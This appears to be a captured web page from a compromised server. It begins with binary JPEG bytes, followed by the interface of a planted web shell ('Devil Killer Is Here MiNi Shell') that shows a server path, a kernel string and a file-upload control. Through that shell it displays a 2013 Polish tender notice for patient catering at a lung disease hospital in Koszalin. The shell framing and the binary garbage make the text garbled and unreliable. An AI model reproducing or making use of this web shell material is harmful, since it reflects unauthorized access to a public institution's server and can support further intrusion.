JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130114/18420-N-2013.html

<p class="kh_header"><b>Koszalin: Usługa żywienia pacjentów szpitala Specjalistycznego Zespołu Gruźlicy i Chorób Płuc w Koszalinie</b><br>
<b>Numer ogłoszenia: 18420 - 2013; data zamieszczenia: 14.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Zespół Gruźlicy i Chorób Płuc w Koszalinie , ul. Niepodległości 44-48, 75-252 Koszalin, woj. zachodniopomorskie, tel. 094 3423339, faks 094 3423339.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzp.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szgichp.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa żywienia pacjentów szpitala Specjalistycznego Zespołu Gruźlicy i Chorób Płuc w Koszalinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa codziennego przygotowania i gotowania posiłków dla pacjentów szpitala  w ramach  istniejącej kuchni szpitalnej  oraz prowadzenie stołówki dla pracowników.Zamawiający przejmuje prowadzenie żywienia na bazie istniejącej w szpitalu kuchni bez personelu kuchni. Zamawiający wydzierżawi istniejące zaplecze kuchenne do prowadzenia usługi o pow.180m2, za które będzie ponosił koszty zawarte w oddzielnej umowie dzierżawy, obejmujące dzierżawę pomieszczeń za cenę 13,00 zł. netto za 1m2 bez kosztów mediów 
( energii elektrycznej, gazu, wody, telefonu) oraz uzgodnione koszty użycia sprzętu i wyposażenia kuchennego przejętego protokołem przez wykonawcę. 
Stan techniczny pomieszczeń i urządzeń ogólnie dobry, brak decyzji Sanepidu.
Koszty zużycia energii, gazu, wody bieżącej ustalone zostaną wg. wskazań licznika po cenach dostawy. Oświadczenie w tej sprawie zawiera zał. nr 2 do SIWZ
Wykonawca zagwarantuje, że przygotowanie posiłków będzie przeprowadzane zgodnie z warunkami określonymi w ustawie z 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia ( Dz. U. z 2006 r. Nr 171, poz. 1225 ), oraz zasadami racjonalnego żywienia chorych i prozdrowotnego charakteru żywienia i przestrzegania norm żywieniowych zalecanych przez Instytut Żywności i Żywienia dla poszczególnych grup ludności przebywających w szpitalu, wg. wieku, płci i stanu fizjologicznego.                
Każdy posiłek podstawowy (śniadanie, obiad i kolacja) z tzw. diety normalnej, oraz innej diety musi zawierać dostateczną ilość produktów białkowych, dodatek warzyw i owoców. Wartość kaloryczna posiłków ogółem powinna się mieścić w granicach 2300 - 2400 kcal, w tym białko ogółem 80g, ( tym białko zwierzęce - 45g), tłuszcze - 80g, węglowodany - 325g.
Wartość kaloryczna poszczególnych posiłków winna mieścić się w następujących przedziałach: Śniadanie:   690 - 805 kcal, co stanowi 30-35 % rozdziału całodziennego zapotrzebowania  energetycznego na poszczególne posiłki Dla chorych z dietą cukrzycową przyjmujących insulinę -
II śniadanie. 
Obiad:   805 - 920 kcal, co stanowi 35 - 40 % rozdziału całodziennego zapotrzebowania       energetycznego na poszczególne posiłki.
Kolacja:   575 - 690 kcal, co stanowi 25 - 30 % rozdziału całodziennego zapotrzebowania energetycznego na poszczególne posiłki. Dla chorych z dietą cukrzycową przyjmujących insulinę - 
II kolację.   
Do posiłków należy przewidzieć: 
Śniadanie - zupa mleczna (zawsze), herbata lub kawa mleczna, 
                        Obiad - kompot lub kisiel płynny itp.
                        Kolacja - herbata lub kawa mleczna lub kawa zbożowa
     W razie potrzeby szczególnie w okresie letnim zimne napoje dla pacjentów: kawa czarna, herbata, kompot, kisiel itp.  1tj. dietetyczkę szpitala w dni robocze a dni wolne pielęgniarki dyżurujące oddziału I i II i ZPO.
Posiłki należy dostarczać wg. ustalonego harmonogramu, w osobnych szczelnie zamkniętych naczyniach (termosach) z oznakowaniem oddziału i ilością porcji. Naczynia (termosy) do windy towarowej na oddziały I i II oraz do wózka na posiłki dla ZPO zabezpiecza Wykonawca. Zapotrzebowanie telefoniczne na posiłki dla pacjentów winny być potwierdzone na piśmie w formie zapotrzebowania z podaniem ilości posiłków i diet. Zapotrzebowania te będą stanowić podstawę wystawienia faktury i obciążenia za wykonane usługi żywienia.
  Zapotrzebowania telefoniczne na posiłki dla pacjentów przyjmowanych do Szpitala w godzinach :
      a)16:00 dnia poprzedniego, do godz. 7:30 dnia którego zamówienie dotyczy zgłaszane będą  Wykonawcy telefonicznie - do godziny 7:45 śniadanie.
       b)dla pacjentów przyjętych do Szpitala do godziny 10:00 zgłaszane będą   Wykonawcy telefonicznie 
        do godziny 10:10 obiad.           
       c)dla pacjentów przyjętych do Szpitala w godzinach 11:00 - 16:00 zgłaszane będą Wykonawcy   telefonicznie do godziny 16:10 kolacja
 Wykonawca zobowiązany będzie do:
opracowania i przedstawienia jadłospisów do akceptacji Zamawiającego z 3 dniowym wyprzedzeniem na okres 2 tygodni.
stosowania się do sugestii i uwag Zamawiającego w zakresie planowania jadłospisów i doboru  produktów. 
powiadomienia ze stosownym wyprzedzeniem o zmianach w jadłospisie, których wcześniej nie mógł przewidzieć. 
gwarancji, że posiłki będą urozmaicone z uwzględnieniem sezonowości i tradycji świąt Wielkanocnych i Bożego Narodzenia. 
używania surowców wysokiej jakości bez dodatków preparatów zastępczych, preparatów zwiększających objętość i innych. Zupy i inne potrawy przygotowywane na bazie produktów 
naturalnych, bez półproduktów. 
w przypadku zastosowania innych technologii produkcji posiłków niż wymagane lub zalecane stosownymi przepisami Wykonawca musi uzyskać zgodę Powiatowej Stacji Sanitarno- Epidemiologicznej na ich stosowanie. Zamawiający zastrzega sobie prawo bieżącej kontroli w zakresie przestrzegania przez Wykonawcę przepisów dotyczących technologii produkcji i jakości wykonywanych usług.
Do Wykonawcy należało będzie prowadzenie ewidencji wydawanych posiłków (dokument WZ)  z podziałem na diety oraz oddziały, potwierdzane każdorazowo imiennie przez uprawnione osoby,
 Zamawiający zastrzega sobie prawo do kontroli zgodności rachunków z ewidencją tych posiłków.W kalkulacji ceny żywienia za osobodzień należy podać planowany łączny całodzienny koszt tzw.  wsadu oraz koszt z podaniem oddzielnie ceny posiłku tj.:sniadania, obiadu,	kolacji

Koszt wsadu nie może być niższy niż 6,40 zł. brutto.
Obowiązkiem Wykonawcy będzie: 
dostarczanie posiłków do pomieszczenia windy towarowej skąd nastąpi transport do oddziałów szpitalnych I i II oraz odbiór osobisty przez ZPO,  wykonywania badań na czystość mikrobiologiczną powierzchni, sprzętów oraz rąk personelu raz  w pierwszym kwartale trwania umowy, a następnie, co 6 miesięcy oraz każdorazowo w razie zatruć  i zakażeń pokarmowych czy podejrzeń zatruć i zakażeń przez właściwą stację sanitarno - epidemiologiczną na koszt Wykonawcy, który zobowiązany jest do każdorazowego dostarczenia
wyników tych badań, 
przedstawienie Zamawiającemu wszystkich wyników kontroli nadzoru sanitarnego w zakresie oceny  jadłospisów i posiłków bezzwłocznie po ich uzyskaniu oraz wyników kontroli sanitarnej.  W przypadku stwierdzenia nieprawidłowości podczas kontroli Wykonawca przedstawi na piśmie informację o podjętych działaniach i kopię odpowiedzi do PPIS.
utrzymywanie bieżącej czystości i porządku oraz odpowiedniego stanu sanitarno - technicznego wydzierżawionych pomieszczeń kuchni,
przedstawienie wszystkich posiadanych instrukcji wraz z wykazem stosowanych środków myjących i dezynfekujących dotyczących zwłaszcza:
- przestrzegania higieny osobistej i higieny rąk personelu,
- procesu mycia i dezynfekcji sprzętów, naczyń i powierzchni,
- przedstawienia aktualnego zaświadczenia wydanego przez właściwego powiatowego inspektora  sanitarnego potwierdzającego, że miejsce produkcji posiłków może być wykorzystane do sporządzania 
posiłków dla pacjentów szpitala, całorocznej aktualizacji w/w zaświadczenia i przedstawienia go Zamawiającemu
- przechowywanie próbek pokarmowych ze wszystkich wykonanych i dostarczonych posiłków każdego dnia przez okres 72 godzin z oznaczeniem daty, godziny, zawartości próbki pokarmowej z podpisem osoby odpowiedzialnej za pobieranie tych próbek,
- utylizacja odpadków żywnościowych,
-przestrzeganie obowiązujących przepisów sanitarno - epidemiologicznych p.poż. i bhp oraz realizacja zadań organów kontroli w tym zakresie, 
-obowiązek posiadania i wyposażenia apteczki pierwszej pomocy oraz bieżącego jej uzupełniania.
-wdrożenie i przestrzeganie zasad systemu HACCP,
-przeprowadzenie badań kontrolnych zatrudnionych pracowników, dostarczenie aktualnych wymaganych  książeczek zdrowia, 
-codziennej nieodpłatnej konsumpcji każdego z przygotowanych posiłków przez uprawnionego pracownika Zamawiającego,
-stosowanie odpowiedniego ubioru i obuwia zatrudnionych pracowników, zatrudnienie osób o odpowiednich  kwalifikacjach w szczególności osób odpowiedzialnych za jakość i prowadzenie żywienia,
-gwarancji, że wsad do kotła nie będzie niższy niż podany w umowie.
-bieżące prowadzenie szkoleń dla personelu z zakresu zasad GHP/GMP i systemu HACCP  i uczestnictwo na nich przedstawiciela zamawiającego.
Wykonawca jest obowiązany posiadać i przestrzegać:
Wykaz preparatów i środków dezynfekcyjnych wraz z kartami charakterystyki (do zatwierdzenia przez Zamawiającego)
Mopy z oznaczeniem kolorystycznym, uwzględniającym podział całej Kuchni wraz z zapleczem na strefy w ilości, co najmniej 5 szt. + 5 szt. na wymianę. Pranie i dezynfekcja mopów odbywać się będzie w pralni szpitala. Wykonawca zostanie obciążony kosztem tej usługi (cena za 1 szt. 0,50 zł. netto + podatek VAT.) 
Ścierki do mycia, sprzątania i wycierania dobrej jakości (4 kolory) uwzględniające podział kuchni, wraz z zapleczem. Do zatwierdzenia przez Zamawiającego. Zalecane ścierki - jednorazowe.
Środki ochrony osobistej (rękawice ochronne - jednorazowe, jednolite ubrania i obuwie robocze).
Wykaz ważnych zaświadczeń o przeszkoleniu w zakresie bezpieczeństwa i higieny pracy. 
Zamawiający zastrzega sobie prawo do kontroli przez upoważnionego przez siebie pracownika w zakresie zgodności dostarczonych posiłków z wymaganiami zamawiającego pod względem między innymi: 
na każdym etapie świadczonej dostawy, począwszy od produktu wejściowego do końcowego, wagowym oraz kaloryczności,
terminu podania dostarczonych posiłków,
świeżości i estetyki podania posiłków, utrzymania stanu sanitarno - higienicznego urządzeń, sprzętu, pomieszczeń i wyposażenia, 
dokumentacji związanej z utrzymaniem stanu higieniczno- sanitarnego 
i zapisów z tym związanych (również książeczek zdrowia pracowników),
przestrzegania jakości i higieny posiłków i wymagań systemu HACCP
wglądu do dokumentacji pozwalającej na ocenę prawidłowości żywienia,
w przypadku skarg pacjentów i personelu oraz innych wyjątkowych sytuacjach nie przewidzianych w umowie.
Zamawiający zobowiązuje Wykonawcę do udostępnienia dokumentacji związanej z żywieniem  w celu oceny wywiązywania się ze zobowiązań.
Upoważniony pracownik Zamawiającego ma prawo do kontrolowania faktycznej gramatury posiłków z deklarowaną w jadłospisie, temperatury dostarczanych posiłków, oceny organoleptycznej  i estetyki dostarczanych posiłków. Wyniki kontroli na bieżąco będą dokumentowane w Zeszycie  Kontroli Żywienia . 
Ilość oddziałów do których będą dostarczane posiłki  - 3
 - Ilość łóżek w oddziałach:
1.Oddział  I Chorób Płuc i Gruźlicy  		  - szt. 45
2.Oddział  II Chorób Płuc i Gruźlicy                     - szt. 47
3.Zakład Opiekuńczo Pielęgnacyjny                    - szt. 27
Ilość łóżek ogółem:                                          szt. 119 
Posiłki dla pacjentów muszą być przygotowane o ściśle określonych porach dnia, w związku z ustalonymi godzinami ich podawania :
Śniadanie:    7:15  do   7:30
Obiad:         12:15 do 12:30
Kolacja:       16:30 do 17:00
Zamawiający wyklucza możliwość dostarczania poszczególnych posiłków razem.
Średnia planowana ilość posiłków całodziennych na 1 rok wyniesie 30.000 w tym miesięcznie  2.500..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.32.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie: 
     - 6 000,00 PLN  ( sześć tysięcy złotych). Wykonawca, który nie wniósł wadium, zostaje   wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą. Wadium wnosi się przed upływem terminu składania ofert. Wykonawca powinien dołączyć do oferty oryginał lub kopię dokumentu potwierdzającego jego wniesienie potwierdzoną za zgodność z oryginałem.
Wadium może być wnoszone w formach wskazanych w art. 45 ust. 6 ustawy  tj.:
     - pieniądzu;
     - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,  z tym że poręczenie kasy  jest zawsze poręczeniem pieniężnym;
     - gwarancjach bankowych; 
     - gwarancjach ubezpieczeniowych;   
     - poręczeniach udzielanych przez podmioty o których mowa w art.6b  ust 5 pkt 2 ustawy z dnia   9.XI.2000r utworzeniu  Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158,    z późn. zm.) Dopuszczalne jest złożenie wadium w więcej niż jednej formie.
Wadium wnoszone w pieniądzu należy wpłacić na konto bankowe Zamawiającego   nr: PEK0     S.A. II Oddział Koszalin 51124036531111000041881738  z dopiskiem:
Wadium w postępowaniu na usługę w zakresie żywienia pacjentów szpitala
(a dowód wpłaty lub jego kopię potwierdzoną przez Wykonawcę za zgodność z oryginałem, należy załączyć do oferty.
6.  Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania na rachunku Zamawiającego.
7. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
musi być wystawione na Specjalistyczny Zespół Gruźlicy i Chorób Płuc w Koszalinie
zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna  z przesłanek wymienionych w art. 46 ust. 5 ustawy;
zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie, jeżeli wykonawca  w odpowiedzi na wezwanie, o którym mowa  w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
obejmować zobowiązanie gwaranta (poręczyciela) z tytułu związanych z postępowaniem   o udzielenie zamówienia działań lub zaniechań opisanych w art. 46 ust. 5 ustawy każdego  z Wykonawców;okres ważności wadium nie może być krótszy niż okres związania ofertą.
Zwrot wadium:
- Zamawiający dokonuje zwrotu wadium w przypadkach wymienionych w art.46 ust. 1, 1a  i 2    ustawy.
- Zwrot wadium wniesionego w pieniądzu nastąpi zgodnie z art. 46 ust. 4 ustawy.
- Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono    wadium na podstawie art.46 ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta    została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym  przez zamawiającego.
9.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została   
   wybrana:
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych     w ofercie;
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na  wezwanie, o  którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń,  o których  mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn  nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi się wykazać minimum 1 usługą żywienia zbiorowego, o wartości minimum 300 000 zł. brutto w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie oraz dostarczyć dokumenty potwierdzające należyte wykonanie tych usług. np: referencje z podaniem jej wartości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca przedstawi wykaz planowanej ilości osób, które będą uczestniczyć w wykonywaniu zamówienia, osób  odpowiedzialnych za świadczenie  usługi, wraz  z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia, także głównego zakresu  wykonywanych przez nich czynności ze szczególnym uwzględnieniem dietetyka, szefa lub   kierownika kuchni tj. osób odpowiedzialnych za nadzór nad właściwą realizacją umowy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Warunek ten zostanie spełniony jeżeli Wykonawca przedstawi polisę lub w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, obowiązującej przez cały okres wykonywania zamówienia lub oświadczenie o zobowiązaniu się w przypadku wyboru, do zawarcia umowy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnej z przedmiotem niniejszego zamówienia, na sumę gwarancyjną nie niższą niż  400.000 na rok.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

